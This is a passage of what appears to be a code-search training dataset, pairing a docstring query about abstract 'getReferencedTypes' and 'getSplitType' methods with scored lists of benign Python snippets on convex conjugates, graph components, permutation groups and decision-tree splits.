"def proximal(self):\n if self.exponent == np.inf:\n return proximal_cconj_l1(space=self.domain)\n elif self.exponent == 2:\n return proximal_cconj_l2(space=self.domain)\n else:\n raise NotImplementedError('`gradient` only implemented for p=2 or '\n 'p=inf')",
"def get_bases():\n\tbss = []\n\tfor es in MV.index:\n\t\tbs = []\n\t\tif es == ():\n\t\t\tbs.append(_1)\n\t\telse:\n\t\t\tfor js in es:\n\t\t\t\tbmv = reduce(operator.mul, map(lambda j: e[j], js))\n\t\t\t\tbs.append(bmv)\n\t\t\t\t\n\t\tbss.append(bs)\n\t\n\treturn bss",
"def proximal(self):\n return proximal_cconj_kl(space=self.domain, g=self.prior)",
"def covariates(self):\n return None",
"def coupons(self):\r\n return Coupons(self)",
"def proximal(self):\n return proximal_cconj(proximal_cconj_kl(space=self.domain,\n g=self.prior))",
"def conj(self):\n return np.conj(self)",
"def super_categories(self):\n R = self.base().base_ring()\n category = GradedHopfAlgebrasWithBasis(R)\n return [Realizations(self.base()), category.Quotients()]",
"def conj(self):\n res = self._defer_unary_elementwise(np.conj)\n res.dirs = list(map(opr.neg, res.dirs))\n res.charge = -res.charge\n if self.qodulus is not None:\n res.charge %= res.qodulus\n return res",
"def cyclic_conjugates(self):\n return {self.cyclic_subword(i, i+len(self)) for i in range(len(self))}",
"def pgcd_numerateurs(self):\n\t\tl = []\n\t\tif self.__valide:\n\t\t\tfor m in self.liste_decroissante():\n\t\t\t\te = abs(m.get_coefficient().get_num().valeur())\n\t\t\t\tif not (e in l):\n\t\t\t\t\tl.append(e)\n\t\treturn pgcd_liste(l)",
"def conjugacy_classes(self):\n identity = _af_new(list(range(self.degree)))\n known_elements = {identity}\n classes = [known_elements.copy()]\n\n for x in self.generate():\n if x not in known_elements:\n new_class = self.conjugacy_class(x)\n classes.append(new_class)\n known_elements.update(new_class)\n\n return classes",
"def get_conjugate_acids_of(chebi_ent):\n if hasattr(chebi_ent, 'OntologyParents'):\n return [ent.chebiId for ent in chebi_ent.OntologyParents if\n (ent.type == \"is conjugate acid of\")]\n else:\n return []",
"def conjugate(A):\n if A.is_complex():\n return A.conj()\n return A",
"def proximal(self):\n if self.pointwise_norm.exponent == np.inf:\n return proximal_cconj_l1(space=self.domain)\n elif self.pointwise_norm.exponent == 2:\n return proximal_cconj_l1(space=self.domain, isotropic=True)\n else:\n raise NotImplementedError('`proximal` only implemented for p = 1 '\n 'or 2')",
"def get_conjugate_constructions(self, zero_index=False):\n object_labels, directed_graph = self.get_dependency_graph(zero_index)\n\n sorts = nx.algorithms.dag.all_topological_sorts(directed_graph)\n sorts_list = list(sorts)\n return object_labels, sorts_list",
"def conjugate(x):\n if len(list(x.size())) == 2:\n z = torch.zeros(2, x.size()[1], dtype=torch.double, device=x.device)\n z[0] = x[0]\n z[1] = -x[1]\n\n if len(list(x.size())) == 3:\n z = torch.zeros(\n 2, x.size()[2], x.size()[1], dtype=torch.double, device=x.device\n )\n z[0] = torch.transpose(x[0], 0, 1)\n z[1] = -torch.transpose(x[1], 0, 1)\n\n return z",
"def convex_conj(self):\n convex_conjs = [func.convex_conj for func in self.functionals]\n return SeparableSum(*convex_conjs)",
"def _init_multiplicities(self):\n k = [Integer(1)]\n try:\n for i in range(1, self._.d + 1):\n k.append(integralize(k[-1]*self._.b[i-1]/self._.c[i]))\n self._check_multiplicity(k, i)\n except TypeError:\n raise InfeasibleError(\"%s not integral\" % self.SIZES)\n self._.n = sum(k)\n return k",
"def is_conjugated(self):\n\n return np.array([bond.is_conjugated for bond in self])",
"def abelian_invariants(self):\n if self.is_trivial:\n return []\n gns = self.generators\n inv = []\n G = self\n H = G.derived_subgroup()\n Hgens = H.generators\n for p in primefactors(G.order()):\n ranks = []\n while True:\n pows = []\n for g in gns:\n elm = g**p\n if not H.contains(elm):\n pows.append(elm)\n K = PermutationGroup(Hgens + pows) if pows else H\n r = G.order()//K.order()\n G = K\n gns = pows\n if r == 1:\n break\n ranks.append(multiplicity(p, r))\n\n if ranks:\n pows = [1]*ranks[0]\n for i in ranks:\n for j in range(i):\n pows[j] = pows[j]*p\n inv.extend(pows)\n inv.sort()\n return inv",
"def _coset_representative(self, g, H):\n if H.order() == 1:\n return g\n # The base of self must be an extension of H.base.\n if not(self.base[:len(H.base)] == H.base):\n self._schreier_sims(base=H.base)\n orbits = H.basic_orbits[:]\n h_transversals = [list(_.values()) for _ in H.basic_transversals]\n transversals = [list(_.values()) for _ in self.basic_transversals]\n base = self.base\n base_ordering = _base_ordering(base, self.degree)\n def step(l, x):\n gamma = sorted(orbits[l], key = lambda y: base_ordering[y^x])[0]\n i = [base[l]^h for h in h_transversals[l]].index(gamma)\n x = h_transversals[l][i]*x\n if l < len(orbits)-1:\n for u in transversals[l]:\n if base[l]^u == base[l]^x:\n break\n x = step(l+1, x*u**-1)*u\n return x\n return step(0, g)",
"def _numeric_jacobian(self):\n if self.__numeric_jacobian is None:\n self.__numeric_jacobian = self._lambdify(self._symbolic_jacobian)\n return self.__numeric_jacobian",
"def convex_conj(self):\n return KullbackLeiblerConvexConj(self.domain, self.prior)",
"def get_bases():\n\treturn ((MV.ONE,),) + MV.blades[1:]\n\t# return ((MV.ONE,),) + MV.bases[1:]",
"def get_com(self):\n return self.E, self.L, self.Q",
"def circuits(self) -> List[QuantumCircuit]:\n circ0 = QuantumCircuit(1, 1)\n circ0.measure(0, 0)\n\n circ1 = QuantumCircuit(1, 1)\n circ1.x(0)\n circ1.measure(0, 0)\n\n for i, circ in enumerate([circ0, circ1]):\n circ.metadata = {\n \"experiment_type\": self._type,\n \"qubit\": self.physical_qubits[0],\n \"xval\": i,\n }\n\n return [circ0, circ1]",
"def __init__(self):\n GinacFunction.__init__(self, \"conjugate\",\n conversions=dict(sympy='conjugate'))",
"def convex_conj(self):\n return (1.0 / 4) * L2NormSquared(self.domain)",
"def convex_conj(self):\n return KullbackLeibler(self.domain, self.prior)",
"def get_numerical_derived_accelerations(self):\n # calculate numerical 2° order derivative and return it\n return np.gradient(np.gradient(self.trajectory,axis=1),axis=1)",
"def convex_conj(self):\n return KullbackLeiblerCrossEntropyConvexConj(self.domain, self.prior)",
"def convex_conj(self):\n return IndicatorZero(self.domain, -self.constant)",
"def proximal(self):\n return proximal_cconj(proximal_cconj_kl_cross_entropy(\n space=self.domain, g=self.prior))",
"def get_decomp_list(self, dtype='all'):\n bonded_list = ['bond', 'angle', 'torsion', 'improper']\n bonded14_list = ['coulomb14', 'vdw14']\n nonbonded_list = ['coulomb', 'vdw']\n\n if dtype == 'bonded': return bonded_list\n elif dtype == 'bonded14': return bonded14_list\n elif dtype == 'bonded+': return bonded_list + bonded14_list\n elif dtype == 'nonbonded': return nonbonded_list\n elif dtype == 'nonbonded+': return nonbonded_list + bonded14_list\n else: return bonded_list + bonded14_list + nonbonded_list",
"def convs(self, quantized_only: bool = False) -> List[Conv]:\n\n return list(cast(List['Conv'], self.__op_type_list['Conv'])) \\\n if not quantized_only else [x for x in cast(List['Conv'], self.__op_type_list['Conv'])\n if cast(Conv, x).is_quantized]",
"def GetCommonComponents(self):\n nr = 0\n comp = []\n for i in range(len(self.nodes)):\n comp.append(-1)\n for n in self.nodes:\n if comp[n.index-1] == -1:\n nr += 1\n comp[n.index-1] = nr\n self.Components_R(nr, n, comp)\n return self.GenerateCommonComponents(comp)",
"def connected_components(self) -> List[list]:\n for n in self.dw_graph.get_all_v().values():\n n.distance=0.0\n mega_list = []\n for n in self.dw_graph.get_all_v().values():\n if n.distance!=-10:\n mega_list.append(self.connected_component(n.node_id))\n return mega_list",
"def convex_conj(self):\n return IndicatorNuclearNormUnitBall(\n self.domain,\n conj_exponent(self.outernorm.exponent),\n conj_exponent(self.pwisenorm.exponent))",
"def connected_components(self):\n if self._connected:\n return [self]\n G = Graph()\n G.add_vertices(list(range(self.degree())))\n for p in self._g:\n G.add_edges(enumerate(p.domain()))\n m = G.connected_components()\n if len(m) == 1:\n return [self]\n for mm in m:\n mm.sort()\n m.sort()\n g = [[] for _ in range(len(m))]\n m_inv = [None] * self.degree()\n for t, mt in enumerate(m):\n for i, mti in enumerate(mt):\n m_inv[mti] = i\n for k in range(self.length()):\n tmp = [None] * len(mt)\n for i, mti in enumerate(mt):\n tmp[i] = m_inv[self._g[k](mti)]\n g[t].append(tmp)\n return [Constellation(g=g[i], check=False) for i in range(len(m))]",
"def get(self) -> list:\n return self.__cogs",
"def connected_components(self) -> List[list]:\n self.__set_all_nodes_unvisited()\n res = self.__tarjan()\n # res.reverse()\n return res",
"def convex_conj(self):\n return KullbackLeiblerCrossEntropy(self.domain, self.prior)",
"def convex_conj(self):\n if self.exponent == np.inf:\n return L1Norm(self.domain)\n elif self.exponent == 2:\n return L2Norm(self.domain)\n else:\n return LpNorm(self.domain, exponent=conj_exponent(self.exponent))",
"def coupons(self):\r\n return coup.Coupons(self)",
"def conj(z):",
"def adjoint(self):\n return self.conjugate().transpose()",
"def get_covariate_names(self):\n if self._population_model is None:\n return []\n\n return self._population_model.get_covariate_names()",
"def derived_series(self):\n res = [self]\n current = self\n nxt = self.derived_subgroup()\n while not current.is_subgroup(nxt):\n res.append(nxt)\n current = nxt\n nxt = nxt.derived_subgroup()\n return res",
"def complementary_regions(self):\n g = self._get_puncturefinder_graph()\n # return g.connected_components()\n return list(nx.connected_components(g))",
"def discriminant(self):\r\n return self.__b**2 - (4 * self.__a * self.__c)",
"def convex_conj(self):\n return ConstantFunctional(self.domain, -self.constant)",
"def conjugate(self):\n\n out = empty((self._size, *self.shape[1:]), self.dtype)\n\n if self.fragmented:\n k = self._capacity - self._begin # fragmentation index\n np.conjugate(self[self._begin:], out[:k])\n np.conjugate(self[:self._end], out[k:])\n else:\n if self._begin < self._end:\n part = self[self._begin:self._end]\n elif self._end == 0:\n part = self[self._begin:]\n\n np.conjugate(part, out)\n\n return(out)",
"def get_bases(self):\n # TODO: subclassing\n return (self.py_class,)",
"def complement(self):\n assert self._.d == 2, \"the complement is only defined for two classes\"\n return self._.complement",
"def cg(self):\n\n _cg = [0, 0, 0]\n _sumProduct = [0, 0, 0]\n _sumWeight = 0\n\n for fstnr in self:\n # Calculate the sum of the products\n for i, component in enumerate(fstnr.xyz):\n _sumProduct[i] += component * fstnr.wt\n\n # Calculate the sum of the areas\n _sumWeight += fstnr.wt\n\n # Divide sum of products by sum of areas\n for i, product in enumerate(_sumProduct):\n _cg[i] = product / _sumWeight\n\n return _cg",
"def convex_conj(self):\n return NuclearNorm(self.domain,\n conj_exponent(self.__norm.outernorm.exponent),\n conj_exponent(self.__norm.pwisenorm.exponent))",
"def conj(self):\n \n Out = self._CreateSameType()\n \n for Ind in self.IndList():\n OutInd = tuple(-x for x in Ind)\n \n Out[OutInd]=self[Ind].conj().T\n \n return Out",
"def calc_chromatic_coupling(self):\n raise NotImplementedError('Chromatic Coupling is not Implemented yet.')",
"def convex_conj(self):\n conj_exp = conj_exponent(self.pointwise_norm.exponent)\n return IndicatorGroupL1UnitBall(self.domain, exponent=conj_exp)",
"def gt_bases(self):\n result = []\n for a in self.gt_alleles:\n if a is None:\n result.append(None)\n elif a == 0:\n result.append(self.site.REF)\n else:\n result.append(self.site.ALT[a - 1].value)\n return tuple(result)",
"def channels(self): # type: (...) -> List[BlendingRangePair]\n return self._channels",
"def extra_super_categories(self):\n return [self.base_category()]",
"def base_codes(self):\n bases = []\n\n if self.is_gas_giant:\n bases.append(\"G\")\n if self.is_naval_base:\n bases.append(\"N\")\n if self.is_scout_base:\n bases.append(\"S\")\n if self.is_research_base:\n bases.append(\"R\")\n if self.is_tas:\n bases.append(\"T\")\n if self.is_consulate:\n bases.append(\"I\")\n if self.is_pirate_base:\n bases.append(\"P\")\n\n return \" \".join(bases)",
"def covariates(self) -> List[str]:\n return self._obj._names[\"covariates\"]"
] | [
"0.6720197",
"0.64957684",
"0.63367724",
"0.6140327",
"0.6048907",
"0.6023874",
"0.5890595",
"0.5890595",
"0.5890595",
"0.5890595",
"0.5890595",
"0.5890595",
"0.5890595",
"0.5890595",
"0.5890595",
"0.5890595",
"0.5890595",
"0.5890595",
"0.5890595",
"0.5890595",
"0.5890595",
"0.5890595",
"0.5865215",
"0.5845415",
"0.5821366",
"0.5820317",
"0.5815315",
"0.5783399",
"0.57787544",
"0.5774332",
"0.5772097",
"0.5763859",
"0.5679504",
"0.56636083",
"0.56427765",
"0.55517787",
"0.552264",
"0.5508906",
"0.5462666",
"0.5454695",
"0.5432398",
"0.5422469",
"0.5417685",
"0.54102105",
"0.5408107",
"0.5319588",
"0.5306486",
"0.5289657",
"0.5287049",
"0.5285946",
"0.5275198",
"0.52497894",
"0.5241084",
"0.52278465",
"0.5226252",
"0.52234095",
"0.5219807",
"0.52161777",
"0.52050656",
"0.5199222",
"0.5189515",
"0.51849216",
"0.5183616",
"0.5154867",
"0.5140653",
"0.51309776",
"0.5122071",
"0.511917",
"0.5097439",
"0.5080047",
"0.50778675",
"0.5071287",
"0.5066524",
"0.5065067",
"0.50609446",
"0.50574934",
"0.50412816",
"0.5041148",
"0.5029396",
"0.5028577",
"0.5025304",
"0.50053304",
"0.49896324",
"0.4988791",
"0.49720556",
"0.49658927",
"0.49554482",
"0.495241",
"0.49504754",
"0.49443868",
"0.49440613",
"0.49249414",
"0.4916333",
"0.49110147",
"0.48991126",
"0.4898391",
"0.48895624",
"0.48802876",
"0.48796725",
"0.4876867"
] | 0.6723077 | 0 |
Returns the objects, relations and/or attribute types used by this distinction; it must be overridden. | def getReferencedTypes(self):
raise AbstractMethodException(self.__class__) | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def type(self):\n pass",
"def type(self):\n pass",
"def type(self):\n pass",
"def Type(self):\r\n\t\treturn self._get_attribute('type')",
"def type(self):\n\t\treturn self.type_",
"def target_type(self):",
"def get_metacls(self):\n return type",
"def type(self):\r\n return self.__type",
"def object_type(self):\n return self._object_type",
"def object_type(self):\n return self._object_type",
"def object_type(self):\n return self._object_type",
"def object_type(self):\n return self._object_type",
"def object_type(self):\n return self._object_type",
"def object_type(self) -> str:\n return self._object_type",
"def type(self):\n return self.__type",
"def _reltype(self):\n return self.__reltype",
"def getDistType(self):\n return self.distType",
"def get_model_type(self):\n pass",
"def __repr__(self):\r\n return self.get_distribution_type()",
"def get_type(self, ):\n return self.attrs.get(self.AttributeNames.TYPE, None)",
"def object_type(self) -> str:\n return pulumi.get(self, \"object_type\")",
"def object_type(self) -> str:\n return pulumi.get(self, \"object_type\")",
"def object_type(self) -> str:\n return pulumi.get(self, \"object_type\")",
"def object_type(self) -> str:\n return pulumi.get(self, \"object_type\")",
"def object_type(self) -> str:\n return pulumi.get(self, \"object_type\")",
"def object_type(self) -> str:\n return pulumi.get(self, \"object_type\")",
"def object_type(self) -> str:\n return pulumi.get(self, \"object_type\")",
"def object_type(self) -> str:\n return pulumi.get(self, \"object_type\")",
"def object_type(self) -> str:\n return pulumi.get(self, \"object_type\")",
"def object_type(self) -> str:\n return pulumi.get(self, \"object_type\")",
"def object_type(self) -> str:\n return pulumi.get(self, \"object_type\")",
"def object_type(self) -> str:\n return pulumi.get(self, \"object_type\")",
"def object_type(self) -> str:\n return pulumi.get(self, \"object_type\")",
"def object_type(self) -> str:\n return pulumi.get(self, \"object_type\")",
"def object_type(self) -> str:\n return pulumi.get(self, \"object_type\")",
"def object_type(self) -> str:\n return pulumi.get(self, \"object_type\")",
"def type(self):\n return None",
"def getType(self,):\n\t\treturn self.type;",
"def return_weightType(self):\n return self.__type",
"def use_types( self ) :\n return self._use_types",
"def get_type(self):\r\n return self.mm_type + self.meta_model.get_type()",
"def etypes(self): # -> list[None]:\n ...",
"def get_type(self):\n return self.__animal_type",
"def get_optypelist (self):\n return self.optypelist",
"def type_(self):\n return self._type",
"def get_type ( self, object ):\n return self.type",
"def get_type ( self, object ):\n return self.type",
"def getType(self):\n return self.type",
"def model_type(self):\n return self._model_type",
"def informationtype(self):\n return self._informationtype",
"def etypes(self): # -> list[str]:\n ...",
"def product_type(self):\r\n return self.__class__.__name__",
"def type(self):\n return self._type",
"def type(self):\n return self._type",
"def type(self):\n return self._type",
"def type(self):\n return self._type",
"def type(self):\n return self._type",
"def type(self):\n return self._type",
"def type(self):\n return self._type",
"def type(self):\n return self._type",
"def type(self):\n return self._type",
"def type(self):\n return self._type",
"def type(self):\n return self._type",
"def type(self):\n return self._type",
"def type(self):\n return self._type",
"def type(self):\n return self._type",
"def type(self):\n return self._type",
"def type(self):\n return self._type",
"def type(self):\n return self._type",
"def type(self):\n return self._type",
"def type(self):\n return self._type",
"def type(self):\n return self._type",
"def type(self):\n return self._type",
"def type(self):\n return self._type",
"def _type(self):\n return self._id[1]",
"def _get_type(self):\n return self.__type",
"def _get_type(self):\n return self.__type",
"def _get_type(self):\n return self.__type",
"def _get_type(self):\n return self.__type",
"def _get_type(self):\n return self.__type",
"def _get_type(self):\n return self.__type",
"def _get_type(self):\n return self.__type",
"def _get_type(self):\n return self.__type",
"def _get_type(self):\n return self.__type",
"def _get_type(self):\n return self.__type",
"def _get_type(self):\n return self.__type",
"def _get_type(self):\n return self.__type",
"def _get_type(self):\n return self.__type",
"def _get_type(self):\n return self.__type",
"def _get_type(self):\n return self.__type",
"def _get_type(self):\n return self.__type",
"def _get_type(self):\n return self.__type",
"def _get_type(self):\n return self.__type",
"def _get_type(self):\n return self.__type",
"def _get_type(self):\n return self.__type",
"def _get_type(self):\n return self.__type",
"def _get_type(self):\n return self.__type",
"def _get_type(self):\n return self.__type",
"def _get_type(self):\n return self.__type",
"def _get_type(self):\n return self.__type",
"def _get_type(self):\n return self.__type"
] | [
"0.65846187",
"0.65846187",
"0.65846187",
"0.6552763",
"0.6550641",
"0.64525676",
"0.6426711",
"0.6419668",
"0.64058083",
"0.64058083",
"0.64058083",
"0.64058083",
"0.64058083",
"0.63964784",
"0.6383223",
"0.6366031",
"0.63618296",
"0.6343517",
"0.6325977",
"0.6325582",
"0.62552524",
"0.62552524",
"0.62552524",
"0.62552524",
"0.62552524",
"0.62552524",
"0.62552524",
"0.62552524",
"0.62552524",
"0.62552524",
"0.62552524",
"0.62552524",
"0.62552524",
"0.62552524",
"0.62552524",
"0.62552524",
"0.6251357",
"0.62455416",
"0.6231721",
"0.62281203",
"0.6191322",
"0.61881167",
"0.6185353",
"0.6175413",
"0.6150113",
"0.6147402",
"0.6147402",
"0.613753",
"0.61338556",
"0.6130929",
"0.612989",
"0.6120876",
"0.612054",
"0.612054",
"0.612054",
"0.612054",
"0.612054",
"0.612054",
"0.612054",
"0.612054",
"0.612054",
"0.612054",
"0.612054",
"0.612054",
"0.612054",
"0.612054",
"0.612054",
"0.612054",
"0.612054",
"0.612054",
"0.612054",
"0.612054",
"0.612054",
"0.612054",
"0.6113483",
"0.610381",
"0.610381",
"0.610381",
"0.610381",
"0.610381",
"0.610381",
"0.610381",
"0.610381",
"0.610381",
"0.610381",
"0.610381",
"0.610381",
"0.610381",
"0.610381",
"0.610381",
"0.610381",
"0.610381",
"0.610381",
"0.610381",
"0.610381",
"0.610381",
"0.610381",
"0.610381",
"0.610381",
"0.610381",
"0.610381"
] | 0.0 | -1 |
Returns a tuple of information about the split, such as the stat function for AttributeDistinction. The first element should be a plain-English name of the distinction; the other elements are distinction-dependent. | def getSplitType(self):
raise AbstractMethodException(self.__class__) | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def getsplitinfo():\n \n splitvarlist = spss.GetSplitVariableNames()\n if len(splitvarlist) == 0:\n return [], None\n else:\n splittype = spssaux.getShow(\"split\", olang=\"english\")\n if splittype.lower().startswith(\"layer\"):\n splittype=\"layered\"\n else:\n splittype=\"separate\"\n return splitvarlist, splittype",
"def getSplit(self):\n b_index, b_value, b_score, b_groups = 999, 999, 999, None\n for j in range(len(self[0]) - 1):\n for i in range(len(self)):\n groups = self.splitAttribute(j, self[i][j]) # lit, big\n gini = self.giniIndex(groups)\n if gini < b_score and (j, \"%.1f\" % self[i][j]) not in self.atr:\n b_index, b_value, b_score, b_groups = j, self[i][\n j], gini, groups\n return b_index, b_value, b_groups, b_score",
"def splitmetric(self, dataset, attr, target_attr):\n freq = {}\n splitinfo = 0.0\n \n #Call information gain\n gain = ID3.splitmetric(self, dataset, attr, target_attr);\n samplenumbers = len(dataset)\n # Calculate the frequency of each of the values in the split attribute\n for record in dataset:\n if (record[attr] in freq):\n freq[record[attr]] += 1.0\n else:\n freq[record[attr]] = 1.0\n \n #Calculate split info, entropy of splitter\n for val in list(freq.values()):\n splitinfo += (- val / samplenumbers) * math.log(val / samplenumbers, 2)\n \n #Split info equals 0 when there only one class in data set\n if splitinfo == 0:\n splitinfo = 0.00000001\n \n return gain / splitinfo",
"def split_comp_info(self, catalog_name, split_ver, split_key):\n return self._split_comp_info_dicts[\"%s_%s\" % (catalog_name, split_ver)][split_key]",
"def _print_split_infos(self, node, left, right, left_to_split):\n DEBUG_info = \"#DEBUG n_clusters={n_clusters:04d} to_split={to_split:04d}\"\n infos = dict(n_clusters=self.n_clusters, to_split=left_to_split)\n DEBUG_info += \" score={score}\"\n infos['score'] = _ps(node.score)\n if node.has_children:\n # node was split\n DEBUG_info += \" vec={vec:04d} sl={sl} nl={nl:06d} sr={sr} nr={nr:06d}\"\n infos['vec'] = left.vec\n infos['sl'] = _ps(left.score)\n infos['nl'] = left.size\n infos['sr'] = _ps(right.score)\n infos['nr'] = right.size\n else:\n # node is a leaf\n DEBUG_info += \" LEAF\" + ' ' * 42\n DEBUG_info += \" size={size:06d} path={path}\"\n infos['size'] = node.size\n infos['path'] = node.name\n print DEBUG_info.format(**infos)\n sys.stdout.flush()",
"def get_bnd_info(self):\n nbor = self.nbor\n lihbor, liubor, livbor, _, _, _, _, \\\n litbor, _, _, _, _ = self.bnd_info\n\n return (nbor, lihbor, liubor, livbor, litbor)",
"def get_info_in_tuple(self):\r\n return self.key, self.value, self.get_color(), self.size_tree",
"def split(self):\n return self._clip_metadata.get(\"split\")",
"def splitAttribute(self, atr, divider=0.5):\n big, lit = DecisionTree(None, self.atr), DecisionTree(None, self.atr)\n for d in self:\n if d[atr] > divider: big.append(d)\n else: lit.append(d)\n return lit, big",
"def best_split(self):\n sub_group = []\n\n current_entropy = self.entropy(self._Passengers)\n best_gain = 0 # holds the best entropy difference so far\n best_split = self._Attr[0].get_name()\n relative_entropy = 0 # entropy while taking account for the size of the population\n\n for Attribute in self._Attr:\n relative_entropy = 0\n print(\"Attr considered: \" + Attribute.get_name())\n for Attr_option in Attribute.get_options():\n sub_group = []\n for Passenger in self._Passengers:\n if self.passenger_attr_option_check(Passenger,\n Attribute.get_name(),\n Attr_option): # if P.A = V\n sub_group.append(Passenger)\n if len(sub_group) > 0 and len(self._Passengers) > 0:\n relative_entropy += self.entropy(sub_group) * (len(sub_group)/len(self._Passengers))\n\n if current_entropy - relative_entropy > best_gain:\n best_gain = current_entropy - relative_entropy\n best_split = Attribute.get_name()\n\n print(f\"best split:{best_split} \\n with entropy gain of:\\n {best_gain}\")\n\n return best_split",
"def info(self):\n return (self.kind, self.value)",
"def getSplitAttr(self, data, attributes):\n splitAttrIndex = 0\n lengthAttr = len(attributes)\n del self.infoGain[:]\n index = 0\n while index < lengthAttr:\n self.infoGain.append(self.getInfoGain(data, index))\n index += 1\n\n for gain in self.infoGain:\n if gain == max(self.infoGain):\n break\n splitAttrIndex += 1\n return splitAttrIndex",
"def getSplitFunc(self, splitType):\n if splitType.upper() == \"INFO GAIN\":\n return self.findBestColumnSplitByInfoGain\n elif splitType.upper() == \"GAIN RATIO\":\n return self.findBestColumnSplitByGainRatio\n elif splitType.upper() == \"GINI INDEX\":\n return self.findBestColumnSplitByGini\n return None",
"def best_split(self, X, y, attributes):\n if (self.criterion==\"information_gain\"):\n global_if = float('-inf') # the highest value of information gain/gini gain seen so far\n attr = None\n for attribute in attributes:\n attr_val = X[attribute].copy()\n cur_if = information_gain(y,attr_val,self.type)\n if (cur_if>global_if):\n # Update when a better split is receieved\n global_if = cur_if\n attr = attribute\n return attr\n else:\n global_if = float('inf')\n attr = None\n for attribute in attributes:\n attr_val = X[attribute].copy()\n cur_if = gini_gain(y,attr_val)\n if (global_if>cur_if):\n # Update when a better split is receieved\n global_if = cur_if\n attr = attribute\n return attr",
"def _get_spans(self, span_info_parts: List[str]) -> List[Tuple[int, int, int]]:\n result_spans = []\n\n for p in span_info_parts:\n if p == \"\":\n break\n c, start, end = p.split(\" \")\n if c not in self._semiotic_classes:\n raise KeyError(\"class=\" + c + \" not found in self._semiotic_classes\")\n cid = self._semiotic_classes[c]\n # +1 because this should be indexing on input_ids which has [CLS] token at beginning\n start = int(start) + 1\n end = int(end) + 1\n result_spans.append((cid, start, end))\n return result_spans",
"def get_version_info() -> Tuple[Text, Text]:",
"def split_on_feat(artist):\n # split on the first \"feat\".\n regex = re.compile(plugins.feat_tokens(), re.IGNORECASE)\n parts = [s.strip() for s in regex.split(artist, 1)]\n if len(parts) == 1:\n return parts[0], None\n else:\n return tuple(parts)",
"def get_data_tuple_names(self):\n return (('test_number',))",
"def parse_step_info(self, step: str) -> Tuple[str]:\n step_info = re.findall(r'\\[[^\\[\\]]+\\]', step)[0][1:-1].split('/')\n return step_info[0], step_info[1]",
"def _named_attrs(self, parts:dict) -> \\\n (QA4SMNamedAttributes, list, QA4SMNamedAttributes):\n\n if not self.ismetr():\n raise IOError(self.varname, '{} is not in form of a QA4SM metric variable.')\n\n if self.g == 0:\n a = QA4SMAttributes(self.attrs)\n ref_ds = QA4SMNamedAttributes(a.ref_dc - a._offset_id_dc,\n a.get_ref_names()['short_name'], self.attrs)\n return ref_ds, None, None\n else:\n dss = []\n ref_ds = QA4SMNamedAttributes(parts['ref_id'], parts['ref_ds'], self.attrs)\n ds = QA4SMNamedAttributes(parts['sat_id0'], parts['sat_ds0'], self.attrs)\n dss.append(ds)\n if self.g == 3:\n ds = QA4SMNamedAttributes(parts['sat_id1'], parts['sat_ds1'], self.attrs)\n dss.append(ds)\n mds = QA4SMNamedAttributes(parts['mds_id'], parts['mds'], self.attrs)\n else:\n mds = None\n return ref_ds, dss, mds",
"def split_comp_info_dict(self, catalog_name, split_ver):\n return self._split_comp_info_dicts[\"%s_%s\" % (catalog_name, split_ver)]",
"def get_splits(self) -> Dict[str, np.array]:\n\n return self.splits",
"def values(self):\n\t\treturn tuple(self.dist.values())",
"def get_attributes(self):\n attrs = list()\n syms = list()\n for item in self.gradual_items:\n gi = item.as_integer()\n attrs.append(gi[0])\n syms.append(gi[1])\n return attrs, syms",
"def items(self):\n\t\treturn tuple(self.dist.items())",
"def getSentenceInfo(sentence):\n\tpass",
"def GetCLInfo(cl_info_str):\n return cl_info_str.split('/')",
"def get_sp_info(self, brawler_name: str, sp: str):\n\n for brawler in self.BRAWLERS:\n if brawler == brawler_name:\n sp_name = self.BRAWLERS[brawler][sp]['name']\n sp_ind = int(sp[2]) - 1\n sp_icon = sp_icons[brawler][sp_ind]\n\n return sp_name, sp_icon",
"def split(self):\n return self.dataset_split",
"def __getConcepts(self, split):\n umls_cui = split[0].strip()\n language = split[1].strip()\n kb = split[11].strip()\n term_type = split[12].strip()\n kb_cui = split[13].strip()\n kb_name = split[14].strip()\n return umls_cui, language, kb, term_type, kb_cui, kb_name",
"def getSplitDetectorSignal(self):\r\n\t\treturn self.splitData",
"def split (l):\n segs = l.strip().split ('\\t')\n label = segs [-1]\n words = segs [:-1]\n return words, label",
"def find_split(data):\n ret = {\"router\": None, \"split_point\": None, \"entropy\": get_entropy(data[:, 7])}\n\n # Create array of unique datapoints\n split_points_list = list()\n\n for i in range(data.shape[1] - 1):\n unique_signal = np.unique(data[:, i])\n split_points = list()\n for j in range(len(unique_signal) - 1):\n split_points.append((unique_signal[j]+unique_signal[j+1])/2)\n split_points_list.append(split_points)\n\n # Split data by split points and calculate entropy\n for feature in range(len(split_points_list)):\n for i in range(len(split_points_list[feature])):\n data_l, data_r = split_data(data, feature + 1, split_points_list[feature][i])\n entropy = get_entropy(data_l[:, 7], data_r[:, 7])\n if entropy < ret[\"entropy\"]:\n ret[\"entropy\"] = entropy\n ret[\"router\"] = feature + 1\n ret[\"split_point\"] = split_points_list[feature][i]\n\n return ret[\"router\"], ret[\"split_point\"], split_data(data, ret[\"router\"], ret[\"split_point\"])",
"def getInfo():",
"def getPairStats(): \r\n\r\n #calculcate remainder of equations\r\n s_xx = x_sum_square - (1/n)*(x_sum**2)\r\n s_yy = y_sum_square - (1/n)*(y_sum**2)\r\n s_xy = xy_sum - (1/n)*x_sum*y_sum\r\n \r\n return s_xx, s_yy, s_xy",
"def info(self):\n version_str = self.version\n return Utils.version_str2tuple(version_str)",
"def getStati(self):\n raise \"not implemented\"",
"def __to_tuple(self):\n return (self.bucket, self.name)",
"def parse(self):\n # type: () -> Tuple[LineNo, int, LineNo, int]\n metadata = self.safely_parse_metadata()\n if len(metadata) > 2:\n raise UnsupportedCombinedDiff(self.text)\n assert len(metadata) == 2\n return tuple(flatten(metadata)) # type: ignore[return-value]",
